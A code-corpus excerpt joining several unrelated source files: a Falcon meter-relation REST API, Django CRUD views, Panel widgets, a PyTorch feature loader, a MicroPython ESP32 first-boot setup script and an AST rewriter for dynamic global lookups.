cursor.execute(add_row, (id_, offline_meter_id, is_output))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + '/offlinemeters/' + str(offline_meter_id)
class CombinedEquipmentOfflineMeterItem:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentOfflineMeterItem"""
pass
@staticmethod
def on_options(req, resp, id_, mid):
resp.status = falcon.HTTP_200
@staticmethod
@user_logger
def on_delete(req, resp, id_, mid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not mid.isdigit() or int(mid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_OFFLINE_METER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_offline_meters "
" WHERE id = %s ", (mid,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.OFFLINE_METER_NOT_FOUND')
cursor.execute(" SELECT id "
" FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s AND offline_meter_id = %s ", (id_, mid))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_OFFLINE_METER_RELATION_NOT_FOUND')
cursor.execute(" DELETE FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s AND offline_meter_id = %s ", (id_, mid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
class CombinedEquipmentVirtualMeterCollection:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentVirtualMeterCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT id, name, uuid "
" FROM tbl_energy_categories ")
cursor.execute(query)
rows_energy_categories = cursor.fetchall()
energy_category_dict = dict()
if rows_energy_categories is not None and len(rows_energy_categories) > 0:
for row in rows_energy_categories:
energy_category_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT m.id, m.name, m.uuid, m.energy_category_id, em.is_output "
" FROM tbl_combined_equipments e, tbl_combined_equipments_virtual_meters em, tbl_virtual_meters m "
" WHERE em.combined_equipment_id = e.id AND m.id = em.virtual_meter_id AND e.id = %s "
" ORDER BY m.id ")
cursor.execute(query, (id_,))
rows = cursor.fetchall()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
energy_category = energy_category_dict.get(row['energy_category_id'], None)
meta_result = {"id": row['id'], "name": row['name'], "uuid": row['uuid'],
"energy_category": energy_category,
"is_output": bool(row['is_output'])}
result.append(meta_result)
        cursor.close()
        cnx.disconnect()
        resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=str(ex))
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
new_values = json.loads(raw_json)
if 'virtual_meter_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['virtual_meter_id'], int) or \
new_values['data']['virtual_meter_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_VIRTUAL_METER_ID')
virtual_meter_id = new_values['data']['virtual_meter_id']
if 'is_output' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_VALUE')
is_output = new_values['data']['is_output']
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" from tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_virtual_meters "
" WHERE id = %s ", (virtual_meter_id,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.VIRTUAL_METER_NOT_FOUND')
query = (" SELECT id "
" FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s AND virtual_meter_id = %s")
cursor.execute(query, (id_, virtual_meter_id,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR',
description='API.COMBINED_EQUIPMENT_VIRTUAL_METER_RELATION_EXISTS')
add_row = (" INSERT INTO tbl_combined_equipments_virtual_meters "
" (combined_equipment_id, virtual_meter_id, is_output ) "
" VALUES (%s, %s, %s) ")
cursor.execute(add_row, (id_, virtual_meter_id, is_output))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + '/virtualmeters/' + str(virtual_meter_id)
class CombinedEquipmentVirtualMeterItem:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentVirtualMeterItem"""
pass
@staticmethod
def on_options(req, resp, id_, mid):
resp.status = falcon.HTTP_200
@staticmethod
@user_logger
def on_delete(req, resp, id_, mid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not mid.isdigit() or int(mid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_VIRTUAL_METER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_virtual_meters "
" WHERE id = %s ", (mid,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.VIRTUAL_METER_NOT_FOUND')
cursor.execute(" SELECT id "
" FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s AND virtual_meter_id = %s ", (id_, mid))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_VIRTUAL_METER_RELATION_NOT_FOUND')
cursor.execute(" DELETE FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s AND virtual_meter_id = %s ", (id_, mid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
| 2.296875 | 2 |
app/filesystem/save.py | Hacker-1202/Selfium | 14 | 12759584 | <reponame>Hacker-1202/Selfium
import json
def save(cfg):
with open("data/config.json", "w") as writeFile:
        writeFile.write(json.dumps(cfg))  # the 'with' block closes the file; an explicit close() is redundant | 1.976563 | 2 |
geniza/footnotes/apps.py | kmcelwee/geniza | 0 | 12759585 | <gh_stars>0
from django.apps import AppConfig
class FootnotesConfig(AppConfig):
name = "geniza.footnotes"
verbose_name = "Scholarship Records"
| 1.0625 | 1 |
Back-End/src/Projects/views.py | steve-njuguna-k/Django-Angular-Projects-Manager | 1 | 12759586 | from .serializers import CategorySerializer, TaskSerializer, MemberSerializer, ProjectSerializer
from .models import Categories, Tasks, Members, Projects
from rest_framework import status
from rest_framework.parsers import JSONParser
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
# Create your views here.
@csrf_exempt
def ProjectAPI(request, id=0):
if request.method == 'GET':
project = Projects.objects.all()
serializer = ProjectSerializer(project, many=True)
return JsonResponse(serializer.data, safe=False, status=status.HTTP_200_OK)
elif request.method == 'POST':
project_data = JSONParser().parse(request)
serializer = ProjectSerializer(data=project_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Project Added Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Add Project', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'PUT':
project_data = JSONParser().parse(request)
project = Projects.objects.get(ProjectID = project_data['ProjectID'])
serializer = ProjectSerializer(instance=project, data=project_data)
if serializer.is_valid():
serializer.save()
            return JsonResponse('Project Updated Successfully!', safe=False, status=status.HTTP_200_OK)
return JsonResponse('Failed To Update Project', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
project = Projects.objects.get(ProjectID=id)
project.delete()
return JsonResponse('Project Successfully Deleted!', safe=False, status=status.HTTP_200_OK)
@csrf_exempt
def TaskAPI(request, id=0):
if request.method == 'GET':
task = Tasks.objects.all()
serializer = TaskSerializer(task, many=True)
return JsonResponse(serializer.data, safe=False, status=status.HTTP_200_OK)
elif request.method == 'POST':
task_data = JSONParser().parse(request)
serializer = TaskSerializer(data=task_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Task Added Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Add Task', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'PUT':
task_data = JSONParser().parse(request)
task = Tasks.objects.get(TaskID = task_data['TaskID'])
serializer = TaskSerializer(instance=task, data=task_data)
if serializer.is_valid():
serializer.save()
            return JsonResponse('Task Updated Successfully!', safe=False, status=status.HTTP_200_OK)
return JsonResponse('Failed To Update Task', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
task = Tasks.objects.get(TaskID=id)
task.delete()
return JsonResponse('Task Successfully Deleted!', safe=False, status=status.HTTP_200_OK)
@csrf_exempt
def CategoryAPI(request, id=0):
if request.method == 'GET':
category = Categories.objects.all()
serializer = CategorySerializer(category, many=True)
return JsonResponse(serializer.data, safe=False, status=status.HTTP_200_OK)
elif request.method == 'POST':
category_data = JSONParser().parse(request)
serializer = CategorySerializer(data=category_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Category Added Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Add Category', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'PUT':
category_data = JSONParser().parse(request)
category = Categories.objects.get(CategoryID = category_data['CategoryID'])
serializer = CategorySerializer(instance=category, data=category_data)
if serializer.is_valid():
serializer.save()
            return JsonResponse('Category Updated Successfully!', safe=False, status=status.HTTP_200_OK)
return JsonResponse('Failed To Update Category', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
category = Categories.objects.get(CategoryID=id)
category.delete()
return JsonResponse('Category Successfully Deleted!', safe=False, status=status.HTTP_200_OK)
@csrf_exempt
def MemberAPI(request, id=0):
if request.method == 'GET':
member = Members.objects.all()
serializer = MemberSerializer(member, many=True)
return JsonResponse(serializer.data, safe=False, status=status.HTTP_200_OK)
elif request.method == 'POST':
member_data = JSONParser().parse(request)
serializer = MemberSerializer(data=member_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Member Added Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Add Member', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'PUT':
member_data = JSONParser().parse(request)
member = Members.objects.get(MemberID = member_data['MemberID'])
serializer = MemberSerializer(instance=member, data=member_data)
if serializer.is_valid():
serializer.save()
            return JsonResponse('Member Updated Successfully!', safe=False, status=status.HTTP_200_OK)
return JsonResponse('Failed To Update Member', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
member = Members.objects.get(MemberID=id)
member.delete()
return JsonResponse('Member Successfully Deleted!', safe=False, status=status.HTTP_200_OK)
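# A matching urls.py sketch for the views above (illustrative; the route names
# and module path are assumptions, not part of the original source):
#
#     from django.urls import re_path
#     from Projects import views
#
#     urlpatterns = [
#         re_path(r'^api/project/?$', views.ProjectAPI),
#         re_path(r'^api/project/(?P<id>[0-9]+)$', views.ProjectAPI),
#         re_path(r'^api/task/?$', views.TaskAPI),
#         re_path(r'^api/task/(?P<id>[0-9]+)$', views.TaskAPI),
#         re_path(r'^api/category/?$', views.CategoryAPI),
#         re_path(r'^api/category/(?P<id>[0-9]+)$', views.CategoryAPI),
#         re_path(r'^api/member/?$', views.MemberAPI),
#         re_path(r'^api/member/(?P<id>[0-9]+)$', views.MemberAPI),
#     ]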
| 2.125 | 2 |
pengrixio/k8s/__init__.py | iorchard/pengrixio | 0 | 12759587 | import kubernetes.config
import logging
import logging.config
from pengrixio.config import KUBECONFIG
logging.config.fileConfig('logging.conf')
log = logging.getLogger('pengrixio')
# load kubernetes config file.
try:
kubernetes.config.load_kube_config(KUBECONFIG)
except Exception:
    log.warning('kubernetes cluster config file is invalid.')
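# A common fallback (sketch, not in the original) is to try the in-cluster
# service-account configuration when no kubeconfig is usable:
#
#     try:
#         kubernetes.config.load_kube_config(KUBECONFIG)
#     except Exception:
#         try:
#             kubernetes.config.load_incluster_config()
#         except Exception:
#             log.warning('no usable kubernetes configuration found.')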
| 2.015625 | 2 |
lumen/panel.py | holoviz/monitor | 1 | 12759588 | import param
from panel import panel
from panel.reactive import ReactiveHTML
from panel.widgets import FileDownload
try:
# Backward compatibility for panel 0.12.6
import bokeh.core.properties as bp
from panel.links import PARAM_MAPPING
# The Bokeh Color property has `_default_help` set which causes
# an error to be raise when Nullable is called on it. This converter
# overrides the Bokeh _help to set it to None and avoid the error.
# See https://github.com/holoviz/panel/issues/3058
def color_param_to_ppt(p, kwargs):
ppt = bp.Color(**kwargs)
ppt._help = None
return ppt
PARAM_MAPPING[param.Color] = color_param_to_ppt
except Exception:
pass
class DownloadButton(ReactiveHTML):
callback = param.Callable(precedence=-1)
color = param.Color(default='grey', allow_None=True)
data = param.String()
filename = param.String()
hide = param.Boolean(default=False)
size = param.Integer(default=20)
_template = """
<style>
.download-button {
position: absolute;
top: 0px;
right: 0px;
width: {{ size }}px;
height: {{ size }}px;
z-index: 10000;
opacity: {% if hide %}0{% else %}1{% endif %};
transition-delay: 0.5s;
transition: 0.5s;
cursor: pointer;
font-size: {{ size }}px;
{% if color %}color: {{ color }};{% endif %}
}
.download-button:hover {
transition: 0.5s;
opacity: 1;
}
.download-button:focus {
opacity: 1;
}
</style>
<span id="download-button" onclick="${_on_click}" class="download-button">
<i class="fas fa-download"></i>
</span>
"""
_scripts = {
'data': """
if (data.data == null || !data.data.length)
return
const byteString = atob(data.data.split(',')[1]);
// separate out the mime component
const mimeString = data.data.split(',')[0].split(':')[1].split(';')[0];
// Reset data
data.data = '';
// write the bytes of the string to an ArrayBuffer
const ab = new ArrayBuffer(byteString.length);
const ia = new Uint8Array(ab);
for (let i = 0; i < byteString.length; i++) {
ia[i] = byteString.charCodeAt(i);
}
// write the ArrayBuffer to a blob, and you're done
var bb = new Blob([ab], { type: mimeString });
var link = document.createElement('a');
link.href = URL.createObjectURL(bb)
link.download = data.filename
link.click()
"""
}
def __init__(self, object=None, **params):
params['sizing_mode'] = 'stretch_width'
if object is not None:
object = panel(object)
params['object'] = object
super().__init__(**params)
def _on_click(self, event=None):
file_input = FileDownload(callback=self.callback, filename=self.filename)
file_input._transfer()
self.data = file_input.data
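# Usage sketch for DownloadButton (illustrative; not part of the module):
#
#     import io
#     import panel as pn
#     button = DownloadButton(filename='report.csv',
#                             callback=lambda: io.StringIO('a,b\n1,2\n'))
#     pn.Row(button).servable()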
class IconButton(ReactiveHTML):
disabled = param.Boolean(default=False)
color = param.Color(default=None)
icon = param.String(default=None, doc="""
The FontAwesome icon to use.""")
size = param.Integer(default=12, bounds=(0, None))
_template = """
<i id="icon-button" class="fas ${icon}" style="font-size: ${size}px; color: ${color}" onclick=${script('clicked')}></i>
"""
_scripts = {
'clicked': """
if (data.disabled)
return
data.disabled = true;
view._send_event('button', 'click', {target: {value: null}, type: 'icon_click'})
""",
'disabled': """
icon_button.style.cursor = data.disabled ? "not-allowed": "inherit";
"""
}
_event = 'dom_event'
def __init__(self, **params):
super().__init__(**params)
self._callbacks = []
@param.depends('size', watch=True, on_init=True)
def _update_height(self):
self.height = self.size
def on_click(self, callback):
self._callbacks.append(callback)
def js_on_click(self, args={}, code=""):
from panel.links import Callback
return Callback(self, code={'event:'+self._event: code}, args=args)
def _button_click(self, event=None):
try:
for cb in self._callbacks:
cb(event)
finally:
self.disabled = False
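if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): wires a Python
    # callback to an IconButton click; the icon name here is an assumption.
    button = IconButton(icon='fa-bell', size=16)
    button.on_click(lambda event: print('icon clicked'))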
| 2.0625 | 2 |
models/load_model.py | HuguesMoreau/Sensors_similariy | 0 | 12759589 | """
This file contains the necessary code to reconstruct the intermediary features from
a save of the models and inputs
Author Hugues
"""
import torch
from pathlib import Path
if __name__ == '__main__':
import sys
sys.path.append("..")
from param import data_path
file_location = Path(data_path) / Path('models')
from models.store_model_SHL import create_filename, Diagnostic_CNN
from models.store_model_CIFAR import Diagnostic_ResNet
# Diagnostic_ResNet and Diagnostic_CNN will be used for class loading
datasets = ["CIFAR_10", "SHL_2018"]
sensors = {"CIFAR_10":["CIFAR_10"],
"SHL_2018":["Gyr_y", "Acc_norm", "Mag_norm"]}
n_trials = 3 * 2
#%%
def load_data(file_location, dataset, sanity_check=False):
"""
    Loads the data and performs some verifications on the ordering and performance
Parameters
----------
    file_location (Path object or str): the absolute or relative path to the
.pickle objects
dataset (str): either 'SHL_2018' or 'CIFAR_10'
    sanity_check (bool): if True, also loads the raw data and makes sure that we can
recreate the predictions.
Defaults to False
Returns
-------
data: dict
keys = sensor (ex "Acc_norm" or "CIFAR_10")
values = dict
keys = split ('train' or 'val')
values = list of numpy arrays (n_samples, ...)
one array per initialization (3*2 = 6 by default)
models: dict
keys = sensor (ex "Acc_norm" or "CIFAR_10")
values = list of PyTorch nn.Module objects
ground_truth: dict
keys = split ('train' or 'val')
values = np array of ints, containing the class between 0 and n-1
"""
sensors_list = sensors[dataset]
data = {sensor:
{split:
[]
for split in ["train", "val"]}
for sensor in sensors_list}
models = {sensor:
[]
for sensor in sensors_list}
ground_truth = {split:
[]
for split in ["train", "val"]}
if sanity_check: previous_GT = {"train":None, "val":None} # we will check that
# the dataloader does not shuffle the position of the samples
# basic sensors
for sensor in sensors_list:
if sanity_check:
train_dataloader, val_dataloader = torch.load(Path(data_path) / Path("models") / Path("dataloaders-"+dataset+"-"+sensor+'.pt'))
dataloaders = {'train':train_dataloader,
'val': val_dataloader}
for trial_index in range(n_trials):
filename = create_filename(dataset, sensor, trial_index)
features_filepath = Path(data_path) / Path("models") / Path('features-' + filename)
model_filepath = Path(data_path) / Path("models") / Path('model-' + filename)
print(f"loading '{features_filepath}'...", end='')
features_pred_GT_train, features_pred_GT_val = torch.load(features_filepath)
model = torch.load(model_filepath)
features_pred_GT = {"train":features_pred_GT_train,
"val" :features_pred_GT_val
}
print(' ... done')
for i_split, split in enumerate(["train", "val"]):
features, prediction, this_gt = features_pred_GT[split]
ground_truth[split] = this_gt # the value is replaced every time, which is not
# a problem because all GT should be equal
if sanity_check:
score_name, score_value = model.validate(dataloaders[split])
print(f" {dataset:5s} {score_name} {100*score_value:.2f} %")
if previous_GT[split] is None:
previous_GT[split] = this_gt
else :
assert (previous_GT[split] == this_gt).all(), "the order of the samples changed between runs"
data[sensor][split].append(features)
            model.cpu() # we don't need the model to be on GPU anymore
models[sensor].append(model)
return data, models, ground_truth
#%%
if __name__ == "__main__":
load_data(file_location, dataset="SHL_2018", sanity_check=True)
| 2.546875 | 3 |
ports/esp32/boards/AIDONBOARD32/modules/inisetup.py | henriknelson/micropython | 1 | 12759590 | import uos
from flashbdev import bdev
def check_bootsec():
buf = bytearray(bdev.ioctl(5, 0)) # 5 is SEC_SIZE
bdev.readblocks(0, buf)
empty = True
for b in buf:
if b != 0xFF:
empty = False
break
if empty:
return True
fs_corrupted()
def fs_corrupted():
import time
while 1:
print(
"""\
The filesystem appears to be corrupted. If you had important data there, you
may want to make a flash snapshot to try to recover it. Otherwise, perform
factory reprogramming of MicroPython firmware (completely erase flash, followed
by firmware programming).
"""
)
time.sleep(3)
def setup():
check_bootsec()
print("Performing initial setup")
uos.VfsLfs2.mkfs(bdev)
vfs = uos.VfsLfs2(bdev)
uos.mount(vfs, "/")
with open("webrepl_cfg.py", "w") as webrepl_cfg_file:
webrepl_cfg_file.write(
"""\
PASS = '<PASSWORD>'
"""
)
with open("boot.py", "w") as boot_file:
boot_file.write(
"""\
# This file is executed on every boot (including wake-boot from deepsleep)
import esp
import machine
import time
import sys
import traceback
print("Welcome to AidonMeterLogger console!")
print("------------------------------------")
"""
)
with open("main.py", "w") as main_file:
main_file.write(
"""\
from neo import Neo
from meter_reader import MeterReader
neo=Neo(13)
neo.blue()
handler=MeterReader(16)
handler.run()
"""
)
return vfs
| 2.328125 | 2 |
nr/ast/dynamic_eval.py | alex-700/nr-deprecated | 0 | 12759591 | # The MIT License (MIT)
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module provides an AST rewriter that takes Read/Write operations on
global variables and rewrites them to retrieve the variable by a function
instead. Non-global variables are left untouched.
Example:
import os
from os import path
parent_dir = path.dirname(__file__)
def main():
filename = path.join(parent_dir, 'foo.py')
print(filename)
Will be converted to:
import os; __dict__['os'] = os
from os import path; __dict__['path'] = path
__dict__['parent_dir'] = __dict__['path'].dirname(__dict__['__file__'])
def main():
filename = __dict__['path'].join(__dict__['parent_dir'], 'foo.py')
__dict__['print'](filename)
"""
import ast
import collections
import textwrap
import sys
from ..compat import builtins, exec_, string_types
def get_argname(arg):
if isinstance(arg, ast.Name):
return arg.id
elif isinstance(arg, str):
return arg
elif isinstance(arg, ast.arg):
# Python 3 where annotations are supported
return arg.arg
else:
raise RuntimeError(ast.dump(arg))
class NameRewriter(ast.NodeTransformer):
# This code snippet is inserted when using the `from X import *` syntax.
IMPORT_FROM_ALL_ASSIGN = textwrap.dedent('''
# We can not use __import__(module, fromlist=[None]) as some modules seem
# to break with it (see for example nose-devs/nose#1075).
import importlib as __importlib
__module = __importlib.import_module({module!r})
try:
__vars = __module.__all__
except AttributeError:
__vars = [x for x in dir(__module) if not x.startswith('_')]
for __key in __vars:
{data_var}[__key] = getattr(__module, __key)
del __importlib, __module, __vars, __key
''')
def __init__(self, data_var):
self.data_var = data_var
self.stack = []
def __push_stack(self):
self.stack.append({'external': set(), 'vars': set()})
def __pop_stack(self):
self.stack.pop()
def __is_local(self, name):
if not self.stack:
return False
for frame in reversed(self.stack):
if name in frame['external']:
return False
if name in frame['vars']:
return True
return False
def __add_variable(self, name):
assert isinstance(name, string_types), name
if self.stack and name not in self.stack[-1]['external']:
self.stack[-1]['vars'].add(name)
def __add_external(self, name):
if self.stack:
self.stack[-1]['external'].add(name)
def __get_subscript(self, name, ctx=None):
"""
Returns `<data_var>["<name>"]`
"""
assert isinstance(name, string_types), name
return ast.Subscript(
value=ast.Name(id=self.data_var, ctx=ast.Load()),
slice=ast.Index(value=ast.Str(s=name)),
ctx=ctx)
def __get_subscript_assign(self, name):
"""
Returns `<data_var>["<name>"] = <name>`.
"""
return ast.Assign(
targets=[self.__get_subscript(name, ast.Store())],
value=ast.Name(id=name, ctx=ast.Load()))
def __get_subscript_delete(self, name):
"""
Returns `del <data_var>["<name>"]`.
"""
return ast.Delete(targets=[self.__get_subscript(name, ast.Del())])
def __visit_target(self, node):
"""
Call this method to visit assignment targets and to add local variables
to the current stack frame. Used in #visit_Assign() and
#__visit_comprehension().
"""
if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
self.__add_variable(node.id)
elif isinstance(node, (ast.Tuple, ast.List)):
[self.__visit_target(x) for x in node.elts]
def __visit_suite(self, node):
result = node
if isinstance(node, (ast.FunctionDef, ast.ClassDef)):
self.__add_variable(node.name)
if not self.__is_local(node.name):
assign = self.__get_subscript_assign(node.name)
result = [node, ast.copy_location(assign, node)]
self.__push_stack()
if sys.version_info[0] > 2 and isinstance(node, ast.ClassDef):
# TODO: This is a bit of a dirty hack to make sure that super and
# __class__ are considered as local variables in functions.
self.__add_variable('super')
self.__add_variable('__class__')
if isinstance(node, (ast.FunctionDef, ast.Lambda)): # Also used for ClassDef
for arg in node.args.args + getattr(node.args, 'kwonlyargs', []): # Python 2
self.__add_variable(get_argname(arg))
if node.args.vararg:
self.__add_variable(get_argname(node.args.vararg))
if node.args.kwarg:
self.__add_variable(get_argname(node.args.kwarg.arg))
self.generic_visit(node)
self.__pop_stack()
return result
def __visit_comprehension(self, node):
# In Python 3, comprehensions have their own scope.
has_own_scope = (sys.version_info[0] > 2)
if has_own_scope:
self.__push_stack()
for comp in node.generators:
self.__visit_target(comp.target)
self.generic_visit(node)
if has_own_scope:
self.__pop_stack()
return node
def visit_Name(self, node):
if not self.__is_local(node.id):
node = ast.copy_location(self.__get_subscript(node.id, node.ctx), node)
return node
def visit_Assign(self, node):
for target in node.targets:
self.__visit_target(target)
self.generic_visit(node)
return node
def visit_Import(self, node):
assignments = []
for alias in node.names:
name = (alias.asname or alias.name).split('.')[0]
assignments.append(self.__get_subscript_assign(name))
return [node] + [ast.copy_location(x, node) for x in assignments]
def visit_ImportFrom(self, node):
assignments = []
for alias in node.names:
name = alias.asname or alias.name
if name == '*':
code = self.IMPORT_FROM_ALL_ASSIGN.format(module=node.module, data_var=self.data_var)
module = ast.parse(code)
assignments += module.body
else:
assignments.append(self.__get_subscript_assign(name))
return [node] + [ast.copy_location(x, node) for x in assignments]
def visit_ExceptHandler(self, node):
if node.name:
self.__add_variable(get_argname(node.name)) # Python 2 has an ast.Name here, Python 3 just a string
self.generic_visit(node)
if not self.stack and node.name and sys.version_info[0] > 2:
# In Python 2, the node.name will already be replaced with a subscript
# by #visit_Name().
node.body.insert(0, ast.copy_location(self.__get_subscript_assign(node.name), node))
if sys.version_info[0] == 3:
node.body.append(ast.copy_location(self.__get_subscript_delete(node.name), node))
return node
def visit_With(self, node):
if hasattr(node, 'items'):
optional_vars = [x.optional_vars for x in node.items]
else:
# Python 2
optional_vars = [node.optional_vars]
[self.__visit_target(x) for x in optional_vars if x]
self.generic_visit(node)
return node
def visit_For(self, node):
self.__visit_target(node.target)
self.generic_visit(node)
return node
visit_FunctionDef = __visit_suite
visit_Lambda = __visit_suite
visit_ClassDef = __visit_suite
visit_ListComp = __visit_comprehension
visit_SetComp = __visit_comprehension
visit_GeneratorExp = __visit_comprehension
visit_DictComp = __visit_comprehension
def visit_Global(self, node):
for name in node.names:
self.__add_external(name)
def transform(ast_node, data_var='__dict__'):
ast_node = NameRewriter('__dict__').visit(ast_node)
ast_node = ast.fix_missing_locations(ast_node)
return ast_node
def dynamic_exec(code, resolve, assign=None, delete=None, automatic_builtins=True,
filename=None, module_name=None, _type='exec'):
"""
Transforms the Python source code *code* and evaluates it so that the
*resolve* and *assign* functions are called respectively for when a global
variable is access or assigned.
If *resolve* is a mapping, *assign* must be omitted. #KeyError#s raised by
the mapping are automatically converted to #NameError#s.
Otherwise, *resolve* and *assign* must be callables that have the same
interface as `__getitem__()`, and `__setitem__()`. If *assign* is omitted
in that case, assignments will be redirected to a separate dictionary and
keys in that dictionary will be checked before continuing with the *resolve*
callback.
"""
parse_filename = filename or '<string>'
ast_node = transform(ast.parse(code, parse_filename, mode=_type))
